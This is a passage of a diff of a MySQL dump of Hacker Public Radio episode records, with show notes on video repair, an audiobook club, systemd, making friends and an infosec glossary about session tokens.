\n',383,0,0,'CC-BY-NC-SA','video,corrupt,fix,file,linux',0,0,1), +(3907,'2023-07-25','My introduction show',1153,'About me and computers','

The show notes

\n\n',421,0,0,'CC-BY-SA','introduction,solocast',0,0,1); +INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hostid`, `series`, `explicit`, `license`, `tags`, `version`, `downloads`, `valid`) VALUES (3899,'2023-07-13','Repair corrupt video files for free with untruc',320,'This is how I fixed corrupt video files from my dash cam after an accident','

My original blog post on this topic: https://pquirk.com/posts/corruptvideo/

\n
    \n
  • Untruc at Github: https://github.com/anthwlock/untrunc
  • \n
  • Windows version: https://github.com/anthwlock/untrunc/releases
  • \n
  • Arch linux version: https://aur.archlinux.org/packages/untrunc-git
  • \n
\n

Make your donations to:
\nhttps://www.paypal.com/paypalme/anthwlock
\nhttps://vcg.isti.cnr.it/~ponchio/untrunc.php

\n',383,0,0,'CC-BY-NC-SA','video,corrupt,fix,file,linux',0,0,1), (3921,'2023-08-14','HPR AudioBook Club 23 - John Carter of Mars (Books 1-3)',6516,'In this episode the HPR Audiobook Club discusses the first three books of John Carter of Mars','In\nthis episode the HPR Audiobook Club discusses the audiobooks A\nPrincess of Mars, The\nGods of Mars, and The\nWarlord of Mars by Edgar Rice Burroughs\n
\n

Non-Spoiler Thoughts

\n
\n
    \n
  • Burroughs is kind of verbose, which is symbolic of the time period\nin which it was written.
  • \n
\n

Beverage Reviews

\n
\n
    \n
  • Thaj: Tempting fate with a tall glass of the highly\ntoxic, Dihydrogen\nMonoxide
  • \n
  • x1101: Shipyard\nLittle Horror of Hops Its a very amber IPA
  • \n
  • Pokey: Yellow Tail\nChardonay Its definitely a chardonay in flavor. You can taste the\ncost effectiveness up front, but it mellows out on the finish, and is\npretty okay for the price on average.
  • \n
  • FiftyOneFifty: Funky Pumpkin spiced\npumpkin ale
  • \n
  • Mark: Lagunitas IPA
  • \n
\n

Things We Talked About

\n
\n
    \n
  • Chat Secure secure XMPP,\nThink of the children!!!

  • \n
  • Technology on Barsoom

  • \n
  • Deus Ex Machina much???

  • \n
  • Names in fantasy books

  • \n
\n

Our Next Audiobook

\n
\n

See\nYou At The Morgue by Lawrence Blochman

\n

The Next Audiobook Club\nRecording

\n
\n

Right now we are working through a backlog of older episode that have\nalready been recorded. Once that ends we fully anticipate recording new\nepisodes with listener participation.

\n

Feedback

\n
\n

Thank you very much for listening to this episode of the HPR\nAudioBookClub. We had a great time recording this show, and we hope you\nenjoyed it as well. We also hope you\'ll consider joining us next time we\nrecord a new episode. Please leave a few words in the episode\'s comment\nsection.

\n

As always; remember to visit the HPR contribution page HPR could\nreally use your help right now.

\n

Sincerely, The HPR Audiobook Club

\n

P.S. Some people really like finding mistakes. For their enjoyment,\nwe always include a few.

\n

Our Audio

\n
\n

This episode was processed using Audacity. We\'ve been making\nsmall adjustments to our audio mix each month in order to get the best\npossible sound. Its been especially challenging getting all of our\nvoices relatively level, because everyone has their own unique setup.\nMumble is great for bringing us all together, and for recording, but\nit\'s not good at making everyone\'s voice the same volume. We\'re pretty\nhappy with the way this month\'s show turned out, so we\'d like to share\nour editing process and settings with you and our future selves (who, of\ncourse, will have forgotten all this by then).

\n

We use the \"Truncate Silence\" effect with it\'s default settings to\nminimize the silence between people speaking. When used with it\'s\ndefault (or at least reasonable) settings, Truncate Silence is extremely\neffective and satisfying. It makes everyone sound smarter, it makes the\nfile shorter without destroying actual content, and it makes a\nconversations sound as easy and fluid during playback as it was while it\nwas recorded. It can be even more effective if you can train yourself to\nremain silent instead of saying \"uuuuummmm.\" Just remember to ONLY pass\nthe file through Truncate Silence ONCE. If you pass it through a second\ntime, or if you set it too aggressively your audio may sound sped up and\nchoppy.

\n

Next we use the \"Compressor\" effect with the following settings:

\n
Threshold: -30db\n\nNoise Floor: -50db\n\nRatio: 3:1\n\nAttack Time: 0.2sec\n\nDecay Time: 1.0 sec
\n

\"Make-up Gain for 0db after compressing\" and \"compress based on\npeaks\" were both left un-checked.

\n

After compressing the audio we cut any pre-show and post-show chatter\nfrom the file and save them in a separate file for possible use as\nouttakes after the closing music.

\n

We adjust the Gain so that the VU meter in Audacity hovers around\n-12db while people are speaking, and we try to keep the peaks under\n-6db, and we adjust the Gain on each of the new tracks so that all\nvolumes are similar, and more importantly comfortable. Once this is done\nwe can \"Mix and Render\" all of our tracks into a single track for export\nto the .FLAC file which is uploaded to the HPR server.

\n

At this point we listen back to the whole file and we work on the\nshownotes. This is when we can cut out anything that needs to be cut,\nand we can also make sure that we put any links in the shownotes that\nwere talked about during the recording of the show. We finish the\nshownotes before exporting the .aup file to .FLAC so that we can paste a\ncopy of the shownotes into the audio file\'s metadata.

\n

At this point we add new, empty audio tracks into which we paste the\nintro, outro and possibly outtakes, and we rename each track\naccordingly.

\n

Remember to save often when using Audacity. We like to save after\neach of these steps. Audacity has a reputation for being \"crashy\" but if\nyou remember save after every major transform, you will wonder how it\never got that reputation.

\n

Attribution

\n
\n

Record\nScratch Creative Commons 0

\n',157,0,1,'CC-BY-SA','mars, audiobook club, fiction, scifi, audiobook',0,0,1), (4151,'2024-07-01','HPR Community News for June 2024',0,'HPR Volunteers talk about shows released and comments posted in June 2024','',159,47,1,'CC-BY-SA','Community News',0,0,1), (4176,'2024-08-05','HPR Community News for July 2024',0,'HPR Volunteers talk about shows released and comments posted in July 2024','',159,47,1,'CC-BY-SA','Community News',0,0,1), -(3902,'2023-07-18','Introduction to a new series on FFMPEG',474,'In this episode, I introduce FFMPEG, media containers, and codecs','

Links

\n\n\n',300,0,0,'CC-BY-SA','ffmpeg,video streaming,audio streaming',0,0,1); -INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hostid`, `series`, `explicit`, `license`, `tags`, `version`, `downloads`, `valid`) VALUES (3903,'2023-07-19','Why I don\'t love systemd (yet)',396,'Klaatu reads a script by Deepgeek about systemd','

I\'ve been meaning to put down my thoughts about SystemD for the HPR\ncommunity for some while, so here goes.

\n

I want to say that I am not a SystemD hater. When SystemD was a hot\ntopic of debate, many became irrational over it, but I want to start by\nsaying that I don\'t think it\'s a bad technology. I think it is a rather\ngood technology. I just don\'t want it on my personal computer. So I\nwould like to run things down in this order: what is it (as in, what is\nit really,) what makes it a good technology, why I don\'t want it now\n(but might later,) and a few tips for you if you decide that you don\'t\nwant it currently.

\n

SystemD Is not an init system. SystemD includes an init system.\nSystemD Init was faster than SysVInit, but SystemD Init isn\'t the\nfastest init system, and SysVInit now has a parallelization helper, at\nleast on Debian.

\n

So, if SystemD Init is not SystemD, than what is SystemD? To\nunderstand this we must first understand something about Linux. Linux\noperates under a model where there are root processes, and there are\nuser processes. These two kinds of processes are usually called\n\"layers.\" SystemD is actually a third layer, that can be called a system\nlayer. So when SystemD is added to a Linux system, that changes the\nsystem so that there are three layers, a root layer, a user layer, and a\nsystem layer. As such, you now ask SystemD to set how the system runs.\nThis is why SystemD includes things like an init system, because if you\nwant to change what the system is running, you ask SystemD to change it.\nSystemD then messages an appropriate system to implement the change,\nlike messaging its init system to bring up or bring down a system\ndaemon. Once you play out this in your head a bit, you really realize\nthat SystemD acts more like a message passing system in this regard.

\n

So why do I say SystemD is a good technology? Because this can\nstandardize system control. Without SystemD a fleet of computers becomes\nlike individual fingerprints or unique snowflakes. If you manage many\ncomputers, as many professional IT people do, you want them to all run\nthe same, all have the same profiles and general configurations. So if\nyou have a bunch of computers you are running, you can run a lot more if\nthey are all run the same way. If your job requires you to run 10,000\nwebservers, you want them to run identically because it is impossible to\nkeep an understanding of 10,000 unique configurations in a human\nhead.

\n

SystemD really shines in its support of virtualization as well. So\nto speak of servers, I used to run an email server for a few friends.\nEach of us had a userid and number as unix users. The mapping of unix\nuserids and postfix userids can get confusing when it gets big. Thanks\nto SystemD\'s virtualization work, you can actually put a service like\nemail into a namespace situation so that it has only the users root and\nthe daemon user id (like \"postfix\"), so SystemD greatly enhances\nsecurity for server installations. This might help explain its\ndominance in linux distributions that have been traditionally\nserver-centric, such as debian and redhat.

\n

So why don\'t I don\'t want it? Well, I\'ve been doing a lot of talking\nabout professional computer work and corporate work environments, but I\nuse a \"Personal Computer\" as a hobby. I\'ve been out-of-industry for\ndecades now. And when I say \"Personal Computer\" I\'m not talking a\nhardware specification, rather I\'m talking about \"This is my personal\ncomputer where I do things my way, as opposed to my work computer where\nI do things my companies way\". Dear listener, please remember that I did\nthe first community show contribution to HPR, and my topic was about\npersonalization. For me, a hobbyist interested in operating system\nexperimentation, I don\'t want a system layer, I want a traditional\nunix-like system that operates on a two-layer model and does things my\nway, nobody else\'s way.

\n

So, what advice can I give to those who don\'t want SystemD now? Well,\nrecently I\'ve left Debian. Debian, you see, supports init system\ndiversity, but as you now know dear listener, that is different than\nbeing without SystemD. You may have heard that SystemD is\nlinux-specific, that is to say that it runs only on linux, not anything\nlike a BSD system or a Windows system. But you may be curious to know\nthat it is also Gnu-libC specific. Which means that the C compiler must\nuse GNU\'s libC standard library. Thus, if you have a system built around\nthe Musl C standard library like Alpine or Void, or a system like\nAndroid that runs on the Bionic C Standard library, you wont have a\nSystemD system. I\'m personally learning Void as its package manager\nsupports both binary and a ports collection much like the BSD\'s. But\nthat is what I\'m doing on my personal computer, I leave you in the\nfreedom to do things your way on your personal computer!

\n\n',73,99,0,'CC-BY-SA','systemd,linux',0,0,1), +(3902,'2023-07-18','Introduction to a new series on FFMPEG',474,'In this episode, I introduce FFMPEG, media containers, and codecs','

Links

\n\n\n',300,0,0,'CC-BY-SA','ffmpeg,video streaming,audio streaming',0,0,1), +(3903,'2023-07-19','Why I don\'t love systemd (yet)',396,'Klaatu reads a script by Deepgeek about systemd','

I\'ve been meaning to put down my thoughts about SystemD for the HPR\ncommunity for some while, so here goes.

\n

I want to say that I am not a SystemD hater. When SystemD was a hot\ntopic of debate, many became irrational over it, but I want to start by\nsaying that I don\'t think it\'s a bad technology. I think it is a rather\ngood technology. I just don\'t want it on my personal computer. So I\nwould like to run things down in this order: what is it (as in, what is\nit really,) what makes it a good technology, why I don\'t want it now\n(but might later,) and a few tips for you if you decide that you don\'t\nwant it currently.

\n

SystemD Is not an init system. SystemD includes an init system.\nSystemD Init was faster than SysVInit, but SystemD Init isn\'t the\nfastest init system, and SysVInit now has a parallelization helper, at\nleast on Debian.

\n

So, if SystemD Init is not SystemD, than what is SystemD? To\nunderstand this we must first understand something about Linux. Linux\noperates under a model where there are root processes, and there are\nuser processes. These two kinds of processes are usually called\n\"layers.\" SystemD is actually a third layer, that can be called a system\nlayer. So when SystemD is added to a Linux system, that changes the\nsystem so that there are three layers, a root layer, a user layer, and a\nsystem layer. As such, you now ask SystemD to set how the system runs.\nThis is why SystemD includes things like an init system, because if you\nwant to change what the system is running, you ask SystemD to change it.\nSystemD then messages an appropriate system to implement the change,\nlike messaging its init system to bring up or bring down a system\ndaemon. Once you play out this in your head a bit, you really realize\nthat SystemD acts more like a message passing system in this regard.

\n

So why do I say SystemD is a good technology? Because this can\nstandardize system control. Without SystemD a fleet of computers becomes\nlike individual fingerprints or unique snowflakes. If you manage many\ncomputers, as many professional IT people do, you want them to all run\nthe same, all have the same profiles and general configurations. So if\nyou have a bunch of computers you are running, you can run a lot more if\nthey are all run the same way. If your job requires you to run 10,000\nwebservers, you want them to run identically because it is impossible to\nkeep an understanding of 10,000 unique configurations in a human\nhead.

\n

SystemD really shines in its support of virtualization as well. So\nto speak of servers, I used to run an email server for a few friends.\nEach of us had a userid and number as unix users. The mapping of unix\nuserids and postfix userids can get confusing when it gets big. Thanks\nto SystemD\'s virtualization work, you can actually put a service like\nemail into a namespace situation so that it has only the users root and\nthe daemon user id (like \"postfix\"), so SystemD greatly enhances\nsecurity for server installations. This might help explain its\ndominance in linux distributions that have been traditionally\nserver-centric, such as debian and redhat.

\n

So why don\'t I don\'t want it? Well, I\'ve been doing a lot of talking\nabout professional computer work and corporate work environments, but I\nuse a \"Personal Computer\" as a hobby. I\'ve been out-of-industry for\ndecades now. And when I say \"Personal Computer\" I\'m not talking a\nhardware specification, rather I\'m talking about \"This is my personal\ncomputer where I do things my way, as opposed to my work computer where\nI do things my companies way\". Dear listener, please remember that I did\nthe first community show contribution to HPR, and my topic was about\npersonalization. For me, a hobbyist interested in operating system\nexperimentation, I don\'t want a system layer, I want a traditional\nunix-like system that operates on a two-layer model and does things my\nway, nobody else\'s way.

\n

So, what advice can I give to those who don\'t want SystemD now? Well,\nrecently I\'ve left Debian. Debian, you see, supports init system\ndiversity, but as you now know dear listener, that is different than\nbeing without SystemD. You may have heard that SystemD is\nlinux-specific, that is to say that it runs only on linux, not anything\nlike a BSD system or a Windows system. But you may be curious to know\nthat it is also Gnu-libC specific. Which means that the C compiler must\nuse GNU\'s libC standard library. Thus, if you have a system built around\nthe Musl C standard library like Alpine or Void, or a system like\nAndroid that runs on the Bionic C Standard library, you wont have a\nSystemD system. I\'m personally learning Void as its package manager\nsupports both binary and a ports collection much like the BSD\'s. But\nthat is what I\'m doing on my personal computer, I leave you in the\nfreedom to do things your way on your personal computer!

\n\n',73,99,0,'CC-BY-SA','systemd,linux',0,0,1), (3904,'2023-07-20','How to make friends',2861,'This topic is being actively researched. Not for production use.','

Show notes

\n
    \n
  • \n

    No clear mark of when friendship starts

    \n
  • \n
  • \n

    often feels \"right\" when mutual

    \n
  • \n
  • \n

    to some people friendship is a persistent state. once you have it, it's forever unless explicitly dissolved.

    \n
  • \n
  • \n

    for other people, it's something requiring maintenance. arguable this suggests that there are degrees of friendship, based on when you last spoke to one another.

    \n
  • \n
  • \n

    degrees of friendship also suggests progression. friend → close friend → best friend.

    \n
  • \n
\n

how to make a friend

\n

friendship requires communication.

\n
    \n
  • \n

    start by communicating in some way that makes the other person feel not unpleasant

    \n
  • \n
  • \n

    you're not supposed to target a friend. this can be a frustrating rule, because if you're trying to make a friend, you have to target somebody, but the general consensus is that you're not supposed to \"try too hard\". target lots of people in the hopes of stumbling across somebody to befriend.

    \n
  • \n
  • \n

    complimenting something they have done, even if it's something simple like wearing a cool shirt, is a very easy start

    \n
  • \n
  • \n

    finding ground common allows for repeated communication

    \n
  • \n
  • \n

    repetition of this is what builds friendship. this is why friendships often develop at work, but can dissolve quickly after a job change.

    \n
  • \n
  • \n

    the situation matters. chatting with someone who's being paid to interact with you, like somebody working at a store, doesn't count because in context they more or less cannot choose to stop communicating with you until you leave the store. chatting with someone who has anything to gain by chatting with you doesn't count (like an intern at work).

    \n
  • \n
  • \n

    to speed up a developing friendship, you can invite the person to interact with you on something with a clearly defined goal. You like coding? I like coding! Would you care to collaborate for 4 hours on a script that would help me find my Raspberry Pi on my network?

    \n
  • \n
  • \n

    during the activity, continue to communicate. this can be difficult because you're doing an activity that you both claim to enjoy, so in theory the activity should be sufficient to further the friendship. However, the activity doesn't build the friendship, it only builds a partnership. It's the communication that builds friendship.

    \n
  • \n
\n

unfortunately, there's no clear point during this process at which you know you have made a friend. so you have to define what a friend is, to you, and then work toward that goal.

\n

Here are some examples of definitions for friendship. There is no right or wrong here, it's really just setting your own expectations and requirements:

\n
    \n
  • \n

    A friend is someone to hang out with on sundays.

    \n
  • \n
  • \n

    A friend is someone I can call when I've got some free time to kill.

    \n
  • \n
  • \n

    A friend is someone I can play video games with online.

    \n
  • \n
  • \n

    A friend is someone I can call, day or night, when I need help.

    \n
  • \n
  • \n

    A friend is someone who has come over for dinner, and has met my family, and who I see at least once a month.

    \n
  • \n
\n

There's no official definition, so you must define it yourself.\nYour definition may differ from the other person's definition.\nYou might say \"we are best friends\" but they might say \"no, I already have a best friend, but you're a good friend\" and THAT'S OK.

\n

If it helps, classify what kinds of friends you have so you understand what kinds of relationships you are maintaining.\nCommunicate with your friends, even if it's only to let them know that you're bad at communicating on a regular basis, or ask them how frequently they need to communicate to maintain a healthy friendship.

\n',78,108,0,'CC-BY-SA','autism,friendship,relationship,social engineering',0,0,1), (3905,'2023-07-21','Presenting Fred Black',1105,'I have a short talk to present Fred Black.','
    \n
  • IB-program https://ibo.org/
  • \n
  • Animals To The Max https://corbinmaxey.com/podcast-1
  • \n
  • I Spend A Day With... https://feeds.megaphone.fm/ispentadaywith
  • \n
  • The Vinyl Guide https://www.thevinylguide.com/
  • \n
  • NSOD - Norsken, Svensken og Dansken https://podkast.nrk.no/program/norsken_svensken_og_dansken.rss
  • \n
\n',309,0,0,'CC-BY-SA','school,podcasts,instrument,quiz',0,0,1), (3906,'2023-07-24','The Oh No! News.',1741,'Sgoti discusses the threat of convenience.','

The Oh No! news.

\n

Oh No! News is Good\nNews.

\n
    \n
  • TAGS: Oh No News, InfoSec, browser security,\nsession tokens, session id
  • \n
\n
\n

InfoSec; the language\nof security.

\n
    \n
  • Source: Session ID.
    \n
  • \n
  • Source: JSON Web\nToken.
    \n\n
      \n
    • Terms\nof Use: Copyleft, free content
      \n
    • \n
  • \n
  • Source: Session\nvs Token Based Authentication.
    \n\n
      \n
    • Terms\nof Use: CC-BY-SA (with CC-BY-NC-SA elements).
      \n
    • \n
  • \n
  • Source: Steal Application\nAccess Token. Adversaries can steal application access tokens as a\nmeans of acquiring credentials to access remote systems and resources.\nApplication access tokens are used to make authorized API requests on\nbehalf of a user or service and are commonly used as a way to access\nresources in cloud and container-based applications and\nsoftware-as-a-service (SaaS).
    \n\n
      \n
    • Terms of\nUse: Similar to CC-BY-SA
      \n
    • \n
  • \n
  • Source: Analysis:\nCircleCI attackers stole session cookie to bypass MFA.
    \n\n
      \n
    • Terms of\nUse: Section 8. CONTENT AND CONTENT LICENSES. NOT\ncertain
      \n
    • \n
  • \n
  • Source: How to Prevent\nSession Hijacking?
    \n\n
  • \n
\n
\n
    \n
  • Additional Information.\n
      \n
    • What is a \"Data\nBreach\"? A data breach is a security violation, in which sensitive,\nprotected or confidential data is copied, transmitted, viewed, stolen,\naltered or used by an individual unauthorized to do so.
    • \n
    • What is \"Malware\"?\nMalware (a portmanteau for\nmalicious software) is any software intentionally designed to cause\ndisruption to a computer, server, client, or computer network, leak\nprivate information, gain unauthorized access to information or systems,\ndeprive access to information, or which unknowingly interferes with the\nuser\'s computer security and privacy.
    • \n
    • What is a \"Payload\"?\nIn the context of a computer virus or worm, the payload is the portion\nof the malware which performs malicious action; deleting data, sending\nspam or encrypting data. In addition to the payload, such malware also\ntypically has overhead code aimed at simply spreading itself, or\navoiding detection.
    • \n
    • What is \"Phishing\"?\nPhishing is a form of social engineering\nwhere attackers deceive people into revealing sensitive information or\ninstalling malware such as ransomware. Phishing\nattacks have become increasingly sophisticated and often transparently\nmirror the site being targeted, allowing the attacker to observe\neverything while the victim is navigating the site, and transverse any\nadditional security boundaries with the victim.
    • \n
    • Social\nengineering (security) In the context of information security,\nsocial engineering is the psychological\nmanipulation of people into performing actions or divulging\nconfidential information. A type of confidence trick for the purpose of\ninformation gathering, fraud, or system access, it differs from a\ntraditional \"con\" in that it is often one of many steps in a more\ncomplex fraud scheme.
      \n
    • \n
    • What is \"Information\nSecurity\" (InfoSec)? Information security, sometimes shortened to\nInfoSec, is the practice of protecting information by mitigating information risks. It\nis part of information risk\nmanagement.\n
        \n
      • Information Security Attributes: Confidentiality, Integrity and Availability (C.I.A.).\nInformation Systems are composed in three main portions, hardware,\nsoftware and communications with the purpose to help identify and apply\ninformation security industry standards, as mechanisms of protection and\nprevention, at three levels or layers: physical, personal and\norganizational. Essentially, procedures or policies are implemented to\ntell administrators, users and operators how to use products to ensure\ninformation security within the organizations.
      • \n
    • \n
    • What is \"Risk\nmanagement\"? Risk management is the identification, evaluation, and\nprioritization of risks followed by coordinated and economical\napplication of resources to minimize, monitor, and control the\nprobability or impact of unfortunate events or to maximize the\nrealization of opportunities.
    • \n
    • What is a \"Vulnerability\"\n(computing)? Vulnerabilities are flaws in a computer system that\nweaken the overall security of the device/system. Vulnerabilities can be\nweaknesses in either the hardware itself, or the software that runs on\nthe hardware.
    • \n
    • What is an \"Attack\nSurface\"? The attack surface of a software environment is the sum of\nthe different points (for \"attack vectors\") where an unauthorized user\n(the \"attacker\") can try to enter data to or extract data from an\nenvironment. Keeping the attack surface as small as possible is a basic\nsecurity measure.
    • \n
    • What is an \"Attack\nVector\"? In computer security, an attack vector is a specific path,\nmethod, or scenario that can be exploited to break into an IT system,\nthus compromising its security. The term was derived from the\ncorresponding notion of vector in biology. An attack vector may be\nexploited manually, automatically, or through a combination of manual\nand automatic activity.
    • \n
    • What is\n\"Standardization\"? Standardization is the process of implementing\nand developing technical standards based on the consensus of different\nparties that include firms, users, interest groups, standards\norganizations and governments. Standardization can help maximize\ncompatibility, interoperability, safety, repeatability, or quality. It\ncan also facilitate a normalization of formerly custom processes.\n
    • \n
    • What is a \"Replay\nattack\"? A replay attack is a form of network attack in which valid\ndata transmission is maliciously or fraudulently repeated or delayed.\nAnother way of describing such an attack is: \"an attack on a security\nprotocol using a replay of messages from a different context into the\nintended (or original and expected) context, thereby fooling the honest\nparticipant(s) into thinking they have successfully completed the\nprotocol run.\"
    • \n
    • What is a\n\"Man-in-the-middle attack\"? In cryptography and computer security, a\nman-in-the-middle, ..., attack is a cyberattack where the attacker\nsecretly relays and possibly alters the communications between two\nparties who believe that they are directly communicating with each\nother, as the attacker has inserted themselves between the two\nparties.
    • \n
    • What is \"Transport Layer\nSecurity\" (TLS)? Transport Layer Security (TLS) is a cryptographic\nprotocol designed to provide communications security over a computer\nnetwork. The protocol is widely used in applications such as email,\ninstant messaging, and voice over IP, but its use in securing HTTPS\nremains the most publicly visible.
    • \n
    • What is a \"Handshake\"\n(computing)?. In computing, a handshake is a signal between two\ndevices or programs, used to, e.g., authenticate, coordinate. An example\nis the handshaking between a hypervisor and an application in a guest\nvirtual machine.
    • \n
    • What is Security\ntheater? The practice of taking security measures that are\nconsidered to provide the feeling of improved security while doing\nlittle or nothing to achieve it.
      \n
    • \n
  • \n
\n
\n\n',391,74,0,'CC-BY-SA','Oh No News, InfoSec, browser security, session tokens, session id',0,0,1), @@ -21178,4 +21178,4 @@ UNLOCK TABLES; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; --- Dump completed on 2023-09-01 9:29:29 +-- Dump completed on 2023-09-02 11:46:27